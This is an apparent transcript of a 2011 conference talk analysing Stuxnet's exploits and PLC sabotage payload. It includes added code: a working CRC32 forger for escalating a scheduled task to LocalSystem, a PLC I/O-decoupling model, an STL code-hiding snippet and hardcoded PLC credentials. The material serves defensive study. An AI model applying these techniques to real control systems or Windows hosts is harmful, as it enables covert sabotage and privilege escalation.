hashdays 2011: Felix 'FX' Lindner - Targeted Industrial Control System Attacks - Lessons from Stuxnet

The talk will show you the technical details of Stuxnet in their full glory and make you appreciate this work of engineering more. Based on a code-level analysis of the Stuxnet PLC payload, the presentation will explain techniques therein that can be used for industrial espionage and sabotage by copycat attackers against competitors' production facilities. Currently recommended defenses, their shortcomings and alternative approaches will also be discussed.
Bio: Felix 'FX' Lindner is founder and technical lead of the Recurity Labs GmbH consulting and research team. He is also the leader of the Phenoelit group and loves to hack pretty much everything with a CPU and some communication, preferably networked. He looks back at 15+ years of (legal) hacking with only a couple of Cisco IOS and SAP remote exploits, tools for hacking HP printers and protocol attacks lining the road.

  • 1. Targeted Industrial Control Process Attacks – Lessons from Stuxnet Felix ‘FX’ Lindner
  • 2. About
    Founder and technical lead of Recurity Labs GmbH
    Over 20 years within the computer industry
    Specialized in attack methodologies and techniques
    Published first exploits against Cisco IOS and RIM BlackBerry
    Reverse engineer by heart
  • 3. Agenda
    Goals of attacks on ICS
    Standard attack patterns
    Technical review of Stuxnet
    Stuxnet prerequisites
    Reusable techniques and patterns
    Current defense strategies
    Alternative defense strategies
  • 4. Goals of ICS Attacks
    ICS attacks that were documented:
     Demonstration purposes
     Power grid
     Chemical industry
     Railroad management
     Detonating a Trans-Siberian natural gas pipeline (disputed)
     Delaying a uranium enrichment program suspected to be used for nuclear weapons
  • 5. Goals of ICS Attacks
  • 6. Goals of ICS Attacks
    Commonly suspected goals in the future:
     Harming the competition
       Delaying production of a competing vendor
       Primarily aimed at just-in-time suppliers
     Blackmailing ICS owners
       Similar to documented cases of network blackmail, e.g. City of San Francisco vs. Terry Childs
     Industrial espionage
       Extraction of ICS programming in order to reverse engineer recipes and algorithms
  • 7. Challenges of ICS Security
    | Topic                     | Office IT          | Control Systems                |
    |---------------------------|--------------------|--------------------------------|
    | Availability              | Planned downtimes  | 24 x 7 x 365 x forever         |
    | Anti-virus                | Widely used        | Uncommon / impossible          |
    | Lifetime                  | 3-5 years          | Up to 20 years                 |
    | Outsourcing               | Common             | Becomes common                 |
    | Software patching         | Regular, scheduled | Slow, vendor specific          |
    | Change management         | Common             | Rare                           |
    | Real-time performance     | Best effort        | Critical (safety, process)     |
    | Security awareness        | Good               | Poor (only physical)           |
    | Security testing + audits | Regular, scheduled | None                           |
    | Physical security         | Difficult          | Good if local, hard if remote  |
    | Time / log correlation    | Common             | Often ignored                  |
  • 9. Internal Attack Patterns
    Direct manipulation through subverted / bribed / disgruntled employees
     Removal of control system source code from the site
     Configuration of various access restrictions using passwords that are not communicated
    Compromise of upstream management systems
     Preferred method for people without ICS knowledge
     SAP plant management and similar home-grown tools with no or very little access control
  • 10. External Attack Patterns
    Pre-compromise of production components
     Logic bombs or intentional vulnerabilities in components acquired by the victim
     Recommending or providing software with "side effects" to suppliers
     Especially well suited for expensive software components
     Method occasionally used within the network community
  • 11. External Attack Patterns
  • 12. External Attack Patterns (cont.)
    1. Compromise a workstation computer in the office network of the target
    2. Compromise a server with a control systems connection within the target's office network
    3. Establish a man-in-the-middle point of control between the operator and the ICS network
    4. Modify the control system
  • 13. The State of the Art in 2005
  • 14. Evolution of Standard Patterns
    Most ICS environments used to be equipment-vendor specific
     In some industries, the production process is completely dependent on the vendors
     Solutions are homogeneous inside, heterogeneous outside of a particular process
    The landscape changes rapidly
     Component-based procurement standardizes the production equipment
     Semi-standardized protocols are used to improve interoperability
     Wireless protocols get introduced to improve flexibility
  • 16. Features of Stuxnet
    Multiple spreading mechanisms:
     CVE-2010-2568, Windows LNK vulnerability: local code execution
     CVE-2010-3888, Windows Task Scheduler: local privilege escalation
     CVE-2010-2743, Windows keyboard layout: local privilege escalation
     CVE-2010-2729, Windows Print Spooler service: remote code execution
     CVE-2008-4250, Windows Server service RPC handling: remote code execution
     Self-copying to remote network shares
     Self-copying to remote Siemens WinCC servers
     Infection of Siemens STEP7 project files for automatic launch upon load
  • 17. Features of Stuxnet (2)
    Peer-to-peer updating mechanism in LANs
    Contacting two predefined C&C (command and control) servers
    Windows rootkit driver covering all Windows versions since 2000
     Driver file is signed with a valid code signing certificate
    Circumvention and corruption of 10 different client security products
     Special treatment for 3 additional ones
    DLL loading routine that fools behavior-based HIDS detection mechanisms
  • 18. Features of Stuxnet (3)
    Fingerprinting an industrial control process through documented and undocumented data structures in programmable logic controllers (PLCs)
    Backdoors all instances of Siemens WinCC and STEP7 by patching their communication DLL in order to hide its presence on the PLC
    Virtualizes the PLC on the PLC itself, in order to modify input and output controls without the legitimate code on the PLC noticing
  • 19. CVE-2010-2568: LNK
    Uses a special feature of .LNK files
    Explorer needs the icon of the LNK file's target in order to render it
    LNK uses "dynamic icons" when pointing to a control panel entry
    Dynamic icons use an alternative handling where Explorer.exe calls the LoadLibrary API on the destination
    LoadLibrary causes the DLL's DllMain function to be executed during load
     100% reliable code execution in the context of the user's Explorer.exe
  • 20. CVE-2010-3888: Task Scheduler
    Uses a CRC32 compensation attack to exploit a design flaw in the Task Scheduler
    When creating a scheduled task, the scheduler creates an XML file for it
     The XML file contains the user the task is executed under
     The XML file is writable by the user creating the task
    The scheduler runs a CRC32 over it and stores the checksum in the registry
     When the execution time arrives, the CRC32 is validated against the file
    Stuxnet modifies the user context of the scheduled task and performs a CRC32 compensation
     100% reliable code execution as LocalSystem on Windows Vista and above
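    The CRC32 compensation is the reusable part of this bug, so here it is worked through. This is an added example, not code from the talk or from Stuxnet: it models the flaw as described on the slide (a user-writable task XML whose only integrity check is a CRC32 kept elsewhere) and shows why that check is worthless. CRC32 is linear, so for any prefix and suffix there are exactly four bytes that make the whole file hash to a chosen value; they are hidden in a trailing XML comment here. The task XML, the SIDs and the path are constructed for this example (a real task file is UTF-16; the sample is ASCII for readability).

```python
"""CRC32 compensation against a CRC-guarded task definition (illustration)."""
import xml.etree.ElementTree as ET
import zlib

POLY = 0xEDB88320
TABLE = []
for n in range(256):
    c = n
    for _ in range(8):
        c = (c >> 1) ^ POLY if c & 1 else c >> 1
    TABLE.append(c)
# The top bytes of the 256 table entries are all distinct, so the top byte of
# a CRC register identifies which table entry produced it.
TOP_INDEX = {t >> 24: i for i, t in enumerate(TABLE)}


def _step(reg, byte):
    """One CRC32 register update (standard reflected table algorithm)."""
    return TABLE[(reg ^ byte) & 0xFF] ^ (reg >> 8)


def _unstep(reg, byte):
    """Inverse of _step: the register value before `byte` was processed."""
    i = TOP_INDEX[reg >> 24]
    return (((reg ^ TABLE[i]) << 8) & 0xFFFFFFFF) | ((i ^ byte) & 0xFF)


def forge_crc32(prefix, suffix, target):
    """Return 4 bytes p such that zlib.crc32(prefix + p + suffix) == target."""
    reg = zlib.crc32(prefix) ^ 0xFFFFFFFF      # register after the prefix
    want = target ^ 0xFFFFFFFF                  # register needed at the very end
    for byte in reversed(suffix):               # register needed right after p
        want = _unstep(want, byte)
    # Walk the 4 unknown bytes backwards: the top byte of every intermediate
    # register pins the table index used in that step, independent of the low
    # bits that are still unknown at that point.
    indices = []
    cur = want
    for _ in range(4):
        i = TOP_INDEX[cur >> 24]
        indices.append(i)
        cur = ((cur ^ TABLE[i]) << 8) & 0xFFFFFFFF
    patch = bytearray()
    for i in reversed(indices):                 # forwards again from the known reg
        patch.append((reg ^ i) & 0xFF)
        reg = _step(reg, patch[-1])
    return bytes(patch)


ORIGINAL_USER = b"S-1-5-21-1111-2222-3333-1001"   # assumed SID of the creating user
LOCAL_SYSTEM = b"S-1-5-18"

# Constructed sample in the style of a Task Scheduler task definition.
TASK_XML = b"""<?xml version="1.0"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals>
    <Principal id="Author">
      <UserId>""" + ORIGINAL_USER + b"""</UserId>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec><Command>C:\\Users\\alice\\payload.exe</Command></Exec>
  </Actions>
</Task>
"""
STORED_CRC = zlib.crc32(TASK_XML)   # what the scheduler keeps in the registry


def scheduler_check(task_xml, stored_crc):
    """The only integrity check the flawed design performs at run time."""
    return zlib.crc32(task_xml) == stored_crc


def escalate_task(task_xml, stored_crc):
    """Switch the task to LocalSystem and compensate so the stored CRC still matches."""
    modified = task_xml.replace(b"<UserId>" + ORIGINAL_USER + b"</UserId>",
                                b"<UserId>" + LOCAL_SYSTEM + b"</UserId>")
    assert modified != task_xml
    # The 4 compensating bytes are arbitrary, so hide them in a trailing XML
    # comment and vary the padding until they are comment-safe (printable and
    # without '-', which could form the forbidden '--').
    for pad in range(4096):
        prefix = modified + b"<!-- " + b"." * pad
        suffix = b" -->\n"
        patch = forge_crc32(prefix, suffix, stored_crc)
        if all(0x20 <= b < 0x7F and b != 0x2D for b in patch):
            return prefix + patch + suffix
    raise RuntimeError("no comment-safe compensation found")


def is_well_formed(task_xml):
    """The forged file must still parse, or the scheduler would reject it."""
    try:
        ET.fromstring(task_xml)
        return True
    except ET.ParseError:
        return False
```

    The point for defenders: a checksum stored separately from the file adds nothing against a writer who controls the file; only a keyed MAC or a signature over the file, verified with a key the writer lacks, would have closed this hole.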
  • 21. CVE-2010-2743: Keyboard Layout
    Windows XP and lower allow keyboard layouts to be loaded from anywhere
    A (not validated) index is loaded from the layout file in kernel mode and used as an index into a function pointer table with 3 entries
    The exploit scans the memory past the function pointer table for DWORDs that are suitable memory addresses in userland
     When one is found (< 0x80000000), it allocates memory there and triggers the vulnerability
     100% reliable code execution as kernel on Windows XP and below
  • 22. CVE-2010-2729: Print Spooler
    Enumerates printer spool shares on the network, connects as the Guest account
    Print job requests to print an EXE and a MOF file, requesting to print to a file in %SYSTEM32%
    When printing for Guest, the spooler does not impersonate the remote user but runs as System, so writing to %SYSTEM32% is allowed
    MOF files are compiled scripts that are placed below %SYSTEM32%
     Windows monitors their creation and executes the MOF file's instructions, running the EXE file
     100% reliable remote code execution as System
  • 23. CVE-2008-4250: Server Service
    Known vulnerability, found being exploited in the wild by W32/Gimmiv.A
     Interesting to note: Gimmiv.A reports installed security products back to the C&C server
    Exploits a vulnerability in the RPC path canonicalization within the remote service
     Patched since 2008 (MS08-067)
     Actually turns out to be a sister vulnerability of MS06-040
    Gains code execution as System
    Widely used exploit in the Metasploit Framework, including a large number of target Windows versions and circumvention of DEP on Windows XP and 2003
     Fair chance of remote code execution as System
  • 24. Special DLL Loading
    Host IDS behavior monitoring usually looks at LoadLibrary API calls
    Stuxnet hooks file handling routines in NTDLL.DLL in order to redirect them into memory areas when special filenames are encountered
    When Stuxnet uses LoadLibrary, the special filenames are invalid on the file system, so the HIDS will ignore the call
  • 25. Corrupting the Watchers
    | Security software | Infected process |
    |-------------------|------------------|
    | KAV v1 to v7      | LSASS.EXE        |
    | KAV v8 to v9      | KAV process      |
    | McAfee            | Winlogon.exe     |
    | AntiVir           | LSASS.EXE        |
    | BitDefender       | LSASS.EXE        |
    | ETrust v5 to v6   | (fail)           |
    | ETrust (other)    | LSASS.EXE        |
    | F-Secure          | LSASS.EXE        |
    | Symantec          | LSASS.EXE        |
    | ESET NOD32        | LSASS.EXE        |
    | Trend PC-cillin   | Trend process    |
  • 26. Siemens STEP7 Project Infection
    Stuxnet patches the STEP7 project file handling routines to modify any project opened in the development or management IDE
     Ignores projects older than 3.5 years
     Ignores projects that appear to be examples
    A specific DLL is placed in the directory "hOmSave7" of the STEP7 project
    STEP7 specific data in "Apilog\types" is modified so that the DLL from "hOmSave7" is loaded when the project file is opened
     The DLL is searched for in %SYSTEM32% and the STEP7 directories first, but when not found there it is loaded from the project's directory
  • 27. Siemens STEP7 Project Infection (2)
    Similar to STEP7 project infections, Stuxnet also infects MCP files, used by Siemens WinCC
     WinCC databases are accessed through a hardcoded username/password combination for an administrative user that cannot be changed
     Stuxnet uses remote SQL commands to transfer itself to the server and execute there
    Project files (even local ones) are infected with a copy of itself and a cabinet file in "GracS\cc_tlg7.sav"
     Such projects, if loaded into a WinCC server manually, may execute Stuxnet as well
  • 28. Siemens PLC Infection
    On Windows PCs with Siemens PLC software, the DLL "s7otbxdx.dll" is replaced by a wrapper
     The original version is kept for functionality
    The wrapper ensures that:
     When writing to the PLC, the Stuxnet PLC payload is added in transit
     When reading from the PLC, the Stuxnet PLC payload is removed and hence hidden from view
     An additional thread runs, monitoring the PLC and verifying target properties
     A second additional thread controls a data block on the PLC, remotely managing its behavior
  • 29. Siemens PLC Infection (2)
    Before infecting any PLC, the injected code on the Windows PC verifies properties:
     PLC CPU type 6ES7-417 or 6ES7-315-2
     CP 342-5 Profibus interface module is present
     At least 33 devices with Profibus identification number 0x7050 or 0x9500 are present
     Identification numbers are assigned globally unique to vendors by PROFIBUS & PROFINET International, comparable to IANA
     The devices are variable frequency drives (VFDs) from Fararo Paya (Iran) and Vacon (Finland)
  • 30. Stuxnet MC7 Payload
    Three payloads are delivered with Stuxnet
     Two almost identical payloads for 315-2 CPUs
       Called Block A and B by Symantec
     One larger payload for 417 CPUs
       Called Block C by Symantec
    Replacement of DP_RECV
     DP_RECV is responsible for the processing of received Profibus messages on the PLC
     The original function code is moved and a malicious replacement is embedded
    Organization Block (OB) 1 (cyclic execution) is patched with a call to the Stuxnet MC7 payload
    OB35 (timed execution) is patched with a call to the Stuxnet MC7 payload (watchdog function)
  • 31. Binary Comparison of Block A and B
  • 32. Stuxnet MC7 Payload (2)
    Block A/B implement a state machine:
    1. Record frames via DP_RECV and monitor values of the VFDs, until enough events are recorded
    2. Wait 2 hours
    3. Send bursts of Profibus frames to the VFDs (Phase I)
       145 or 127 frames (Vacon VFDs)
       34 or 32 frames (Fararo Paya VFDs)
    4. Send bursts (Phase II)
       2 or 36 frames (Vacon VFDs)
       23 or 27 frames (Fararo Paya VFDs)
    5. Reset internal values and reinitialize internal structures
    State 0 is the global error handler.
  • 33. Stuxnet MC7 Payload Code
    STL listing of one payload function (ADD_AC) as disassembled: it leaves the marker DW#16#DEADF007 in ACCU1 when DB888.DBW16 is 3 or 4, and 0 otherwise.

```
ADD_AC:                         // CODE XREF: S7_LV+94p
    OPN   DB888
    L     DBW10h                // word 888.16
    L     W#16#3                // word 3
    <I                          // ACCU2 is less than ACCU1: 3 > 888.16
    JC    loc_2840              // jump if RLO=1 (DW888.16 < 3)
                                // (do not jump if DW888.16 is 3 or more)
    TAK                         // exchange ACCU1 and ACCU2
    L     W#16#4                // ACCU1 = 4
    >I                          // ACCU2 is greater than ACCU1: 4 < 888.16
    JC    loc_2840              // jump if RLO=1 (DW888.16 > 4)
                                // (do not jump if DW888.16 is 4 or less)
    L     DW#16#0DEADF007h      // marker value for "in range"
    PUSH                        // copy ACCU1 into ACCU2
    BE
loc_2840:                       // CODE XREF: ADD_AC+Ej, ADD_AC+1Aj
    L     DW#16#0
    PUSH                        // copy ACCU1 into ACCU2
    BE
```
  • 34. Timing of the MC7 Payload
    Recording takes place for 13 days
    Wait 2 hours (fixed)
    Pause after the first burst is 27 days
    Pause after the second burst is 27 days
     67 days for one cycle of attack
     Wearing out was the goal, not destruction
     The product of the attacked process was the target, not the production equipment
  • 35. PLC Virtualization / Decoupling
    PLCs, including the Siemens S7, execute in cycles:
     Read all input signals and set the input table
     Execute OB1
     Write all output bits from the output table and generate signals
    Stuxnet disables the automatic update of the process image input and output tables
     Essentially decoupling the entire PLC from its sensor array, virtualizing it
     Allows the Stuxnet payload to modify input and output bits (corresponding to signals) so the original code doesn't notice any changes
     No explicit operator spoofing required! This method may even fool people manually debugging the PLC.
  • 36. PLC Input / Output Decoupling
    The listing shows the payload's own calls to SFC 26 (UPDAT_PI) and SFC 27 (UPDAT_PO), the system functions that refresh the process image input and output tables. The (arg) lines are the parameter pointers that follow each UC.

```
    L     LW0
    BLD   +7
    =     L 14h.0
    L     B#16#0
    T     LB15h
    UC    SFC1Ah                // SFC 26 UPDAT_PI: update process image input table
    JU    loc_24
    (arg) P# L 15h.0
    (arg) P# L 0.0
    (arg) P# L 0.0
loc_24:
    BLD   +8
    BLD   +7
    =     L 14h.0
    L     B#16#0
    T     LB15h
    UC    SFC1Bh                // SFC 27 UPDAT_PO: update process image output table
    JU    loc_46
    (arg) P# L 15h.0
    (arg) P# L 0.0
    (arg) P# L 0.0
loc_46:
    BLD   +8
    T     LW0
```
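    To make the decoupling on the two slides above concrete, here is a small model of the scan cycle. This is an added illustration, not Stuxnet or Siemens code: a plant with one drive, a PLC whose legitimate OB1 supervises the drive through the process image, and two hooks reached from OB1 the way the patched OB1 call on slide 30 reaches the payload. The naive hook only rewrites the output image and gets caught by OB1's own alarm a cycle later; the decoupling hook stops the process image from tracking the plant and writes the physical output itself, so everything read from the PLC stays healthy while the real drive does something else. Setpoints and tolerances are assumed numbers for the model.

```python
"""Model of an S7-style scan cycle with a Stuxnet-style process-image decoupling."""

NOMINAL_HZ = 1000     # assumed setpoint of the legitimate program
ATTACK_HZ = 1400      # assumed setpoint the payload drives the VFD to
TOLERANCE_HZ = 50     # assumed alarm threshold of the legitimate program


class Plant:
    """The physical process: one drive that follows its setpoint within a cycle."""

    def __init__(self):
        self.setpoint_hz = 0     # actuator signal (PLC output)
        self.measured_hz = 0     # sensor signal (PLC input)

    def step(self):
        self.measured_hz = self.setpoint_hz


class PLC:
    def __init__(self, plant):
        self.plant = plant
        self.pii = {"measured_hz": 0}                   # process image input
        self.piq = {"setpoint_hz": 0, "alarm": False}   # process image output
        self.auto_update = True   # cyclic UPDAT_PI / UPDAT_PO done by the PLC OS
        self.hook = None          # code reached from OB1, as the patched call does

    def ob1(self):
        """Legitimate user program: run at NOMINAL_HZ, alarm on deviation."""
        self.piq["setpoint_hz"] = NOMINAL_HZ
        deviation = abs(self.pii["measured_hz"] - NOMINAL_HZ)
        self.piq["alarm"] = deviation > TOLERANCE_HZ

    def cycle(self):
        if self.auto_update:                          # inputs -> PII
            self.pii["measured_hz"] = self.plant.measured_hz
        self.ob1()
        if self.hook:
            self.hook(self)
        if self.auto_update:                          # PIQ -> outputs
            self.plant.setpoint_hz = self.piq["setpoint_hz"]
        self.plant.step()


def naive_hook(plc):
    """Tamper with the output image only: OB1 sees the deviation next cycle."""
    plc.piq["setpoint_hz"] = ATTACK_HZ


def decoupling_hook(plc):
    """Freeze the process image and own the physical I/O directly."""
    plc.auto_update = False               # PII/PIQ stop tracking the plant
    plc.plant.setpoint_hz = ATTACK_HZ     # write the real output ourselves


def run(cycles, hook=None, warmup=3):
    """Run the loop; return what the PLC reports versus what the plant does."""
    plant = Plant()
    plc = PLC(plant)
    for i in range(cycles):
        if i == warmup:                   # infection after the process has settled
            plc.hook = hook
        plc.cycle()
    return {
        "image_hz": plc.pii["measured_hz"],   # what an HMI or STEP7 reads from the PLC
        "alarm": plc.piq["alarm"],
        "real_hz": plant.measured_hz,         # what an independent meter would show
    }
```

    Running the three cases side by side is the whole lesson: the undisturbed loop and the decoupled loop look identical from inside the PLC, and only a measurement that does not pass through the process image tells them apart.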
  • 37. BLD: A Trick Not Used
    STEP7 engineers frequently use a simple trick to hide code
    The BLD instruction is used as a marker around blocks of code
     The instruction has no effect on the PLC, but is interpreted by the Siemens editors. Known combinations are:
       BLD 1 / 2 (FC with parameters)
       BLD 3 / 4 (FB with parameters)
       BLD 7 / 8
       BLD 14 / 15 (FC without parameters)
       BLD 103 / 104
       BLD 130 / 131 / 132 / 133 / 255
    The Stuxnet code does not make use of this trick
     It actually keeps the original BLD instructions, wasting space and simplifying analysis using Siemens tools
  • 38. BLD Hiding
    Code wrapped in BLD +7 / BLD +8 is presented by the editor as a single call; the "Always ON" bit jumps over the STOP so that the hidden FCs run instead.

```
      BLD   +7
      A     "Always ON"      // When being nasty, use this snippet
      JC    Run
      UC    SFC 46           // Stops the CPU
Run:  NOP   0
      ... your code ...      // CC or UC of your FCs
      BLD   +8
      Call  SFC46            // what the STEP7 editor shows in place of the block above
```
  • 40. How Much Was Required?
    | Attack capability                 | Required for targeted attack? |
    |-----------------------------------|-------------------------------|
    | CVE-2010-2568 LNK                 | No |
    | CVE-2010-3888 Task Scheduler      | No |
    | CVE-2010-2743 Keyboard Layout     | No |
    | CVE-2010-2729 Print Spooler       | No |
    | CVE-2008-4250 Server Service RPC  | No |
    | Self-copying to network share     | No |
    | Peer-to-peer updating             | No |
    | C&C servers                       | No |
    | Windows rootkit & certificates    | No |
    | 10 AV product circumventions      | No |
    | Behavioral detection evasion      | No |
  • 41. How Much Was Required?
    | Attack capability            | Required for targeted attack? |
    |------------------------------|-------------------------------|
    | Self-copying to WinCC        | Optional |
    | STEP7 project file infection | Yes |
    | ICS process fingerprinting   | Yes |
    | STEP7 DLL backdoor           | Optional |
    | PLC virtualization           | Yes |
  • 42. Relevant Techniques
    Most of Stuxnet's functionality is spreading, survival and persistence oriented
     The measures taken are extreme
    Targeted attacks on an industrial process only need a few key technologies
    If the infection can be accomplished by human means, only the PLC payload stays relevant
     Stuxnet demonstrates how it is done
     There is still significant room for advancements, considering the complexity of the Siemens S7
     Similar attacks are very likely possible with any other PLC vendor's equipment
  • 43. Only In Siemens-Land
    Dillon Beresford showed another way at Black Hat USA 2011:
     Username: basisk
     Password: basisk
    A compromised OS below the MC7 layer is obviously a game-over scenario for any security within the PLC network.
  • 45. Current Defenses
    Siemens still postulates that it's the customer's job to secure its automation process
     Code execution upon STEP7 project loading is not considered a vulnerability. No fix.
     Code execution through fixed passwords on WinCC servers is not fixed. The password has been publicly known since 2008.
     At least the fixed username and password in the PLC OS have supposedly been removed since 2009
    Air gaps? Don't help, don't exist.
     Infected consultants and service engineers
     Process performance dashboards for management
     Agile production environments in supplier fabs
    Virus scanners?
     Have not protected anything since 1970.
  • 46. Future Defenses
    Frequent reprogramming of the entire automation environment
     Proposed by process engineers
     May actually be the best option today
    Langner Controller Integrity Checker (CIC)
     Developed as a response to Stuxnet
     Promising first attempt at solving some of the problems
     Evasion obviously possible, as it suffers from the detection-paradigm (AV software) problem
     Siemens specific, doesn't help with other automation environments
    Both don't help when the underlying OS is infected
  • 47. Future Defenses
    Future defenses can only be developed with a better understanding of the offense
     Stuxnet targets a very specific environment
     Currently flourishing research is completely utility centric (power, water, waste, railway)
    Industrial control systems are extremely environment specific by nature
    The best protection is to evaluate your own environment's vulnerability
     Based on a solid threat model, developed around your business and your likely adversaries
     The only approach that has been shown to work in other emerging threat areas before
  • 48. Thank You!
    Felix 'FX' Lindner, Head
    fx@recurity-labs.com
    Recurity Labs GmbH, Berlin, Germany
    http://www.recurity-labs.com